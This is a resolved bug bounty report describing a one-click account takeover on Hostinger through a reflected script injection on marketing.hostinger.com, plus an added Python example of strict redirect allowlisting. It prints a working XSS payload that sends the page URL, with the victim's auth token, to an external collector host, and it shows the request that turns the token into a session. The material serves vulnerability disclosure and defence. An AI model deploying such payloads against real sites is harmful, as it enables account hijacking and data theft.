1 Click Account Takeover via Auth Token Theft on marketing.hostinger.com
Severity: High
Program: hostinger
Reported by: aziz0x48
Vulnerability Details
## Summary:
Hey Paul, hope you're doing good!
I discovered a One Click Account Takeover vulnerability in Hostinger through the `marketing.hostinger.com` subdomain. Since this subdomain is part of hostinger.com and is whitelisted for redirects, an attacker can exploit it to steal Hostinger users' auth tokens and gain full access to their accounts with just a single click from the victim!
## Steps To Reproduce:
- Log in to the victim's account and visit the URL below, replacing the attacker URL with your own Burp Collaborator URL or your own dedicated server URL:
```
https://auth.hostinger.com/login/?redirectUrl=https%3A%2F%2Fmarketing.hostinger.com%2Fen-us%2Fmarketplace_wix%2Fsite_not_published%3Fredirect_url%3Dx%22%3E%3C%2Fa%3E%3Cscript%3Efetch%28%27https%3A%2F%2Fwqqf8xerhgrhdk251cesqastbkhb54xsm.oastify.com%27%2C%20%7Bmethod%3A%20%27POST%27%2Cbody%3A%20window.location%7D%29%3C%2Fscript%3E
```
## Decoded URL:
```
https://auth.hostinger.com/login/?redirectUrl=https://marketing.hostinger.com/en-us/marketplace_wix/site_not_published?redirect_url=x"></a><script>fetch('https://wqqf8xerhgrhdk251cesqastbkhb54xsm.oastify.com', {method: 'POST',body: window.location})</script>
```
- Check Burp Collaborator / server logs for the victim's account auth token:
{F4227740}
- The attacker can use the leaked auth token to generate a valid JWT for the victim's account and have complete control over the victim's account using the following request:
```
POST /hpanel/auth/auth-token HTTP/2
Host: builder-backend.hostinger.com
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/132.0
Origin: https://builder.hostinger.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Te: trailers
```
{F4227728}
██████
## Suggestion:
I believe that `marketing.hostinger.com` has been rebranded as `rankingcoach.com`. Therefore, it would be best to either shut down the marketing subdomain or remove it from the whitelisted domains. This would be a quick and easy fix to mitigate the issue and enhance users' security.
Thank you,
@aziz0x48
## Supporting Material/References:
Please refer to the attached screenshots and video.
## Impact
This vulnerability poses a significant risk to Hostinger users, as it allows attackers to bypass authentication and gain unauthorized access to accounts with just one click. By exploiting the `marketing.hostinger.com` subdomain, which is whitelisted for redirects, attackers can steal authentication tokens from users. Once the tokens are compromised, the attacker gains full access to the victim's Hostinger account, including critical services such as hPanel, website builder, VPS servers, email, and personal data. This flaw puts all Hostinger users at risk of account takeover, data theft, and potential misuse of sensitive information, making it a serious security concern that requires immediate attention.
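The root cause described in this report is a redirect allowlist that trusts an entire subdomain, so any page on that subdomain with a reflection flaw becomes a sink for the auth token. The following is an added, defender-side example (not code from the report or from Hostinger) showing the difference between a suffix-based host check and an exact-origin allowlist on the issuing side, plus attribute escaping on the rendering side. The allowed origins, the `Continue` link markup and the function names are assumptions made for the example; the only page-derived value is the `marketing.hostinger.com` path from the report's URL, used here without the payload.

```python
import html
from urllib.parse import urlsplit, urlunsplit

# Assumed exact-origin allowlist for this example. A production list would be
# generated from the real post-login destinations, never from a domain suffix.
ALLOWED_REDIRECT_ORIGINS = {
    ("https", "hpanel.hostinger.com"),
    ("https", "builder.hostinger.com"),
}
DEFAULT_LANDING = "https://hpanel.hostinger.com/"


def weak_suffix_check(candidate: str) -> bool:
    """The kind of check the report implies: any *.hostinger.com host passes.

    Shown only to contrast with safe_redirect_url below; do not use as-is.
    """
    host = (urlsplit(candidate).hostname or "").lower()
    return host == "hostinger.com" or host.endswith(".hostinger.com")


def safe_redirect_url(candidate: str, default: str = DEFAULT_LANDING) -> str:
    """Return candidate only if scheme and host match an allowlisted origin exactly.

    Anything else (other subdomains, userinfo tricks, non-https, odd ports)
    falls back to the default landing page. The URL is rebuilt from parsed
    parts so userinfo and fragments never reach the Location header.
    """
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return default
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if scheme != "https" or parts.port not in (None, 443):
        return default
    if parts.username or parts.password:
        return default
    if (scheme, host) not in ALLOWED_REDIRECT_ORIGINS:
        return default
    return urlunsplit((scheme, host, parts.path or "/", parts.query, ""))


def render_continue_link(redirect_url: str) -> str:
    """Defence in depth on the rendering side: validate, then attribute-escape.

    Even an allowlisted URL is escaped with quote=True so a quote or angle
    bracket in the query string cannot close the href attribute, which is
    the reflection pattern the report's redirect_url parameter relied on.
    """
    target = safe_redirect_url(redirect_url)
    return '<a href="%s">Continue</a>' % html.escape(target, quote=True)


if __name__ == "__main__":
    # Page path from the report, without the injected script (constructed input).
    reported_target = ("https://marketing.hostinger.com/en-us/marketplace_wix/"
                       "site_not_published?redirect_url=x")
    print("suffix check accepts it:", weak_suffix_check(reported_target))
    print("exact-origin check sends user to:", safe_redirect_url(reported_target))
    print(render_continue_link('https://hpanel.hostinger.com/?q=a"b'))
```

The suffix check accepts the marketing subdomain, which is exactly why the reporter's fix of removing it from the whitelist works; the exact-origin check never accepted it in the first place, so a newly discovered reflection bug on some other subdomain would not reopen the issue.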
Report Details
State: Closed
Substate: Resolved
Weakness: Improper Access Control - Generic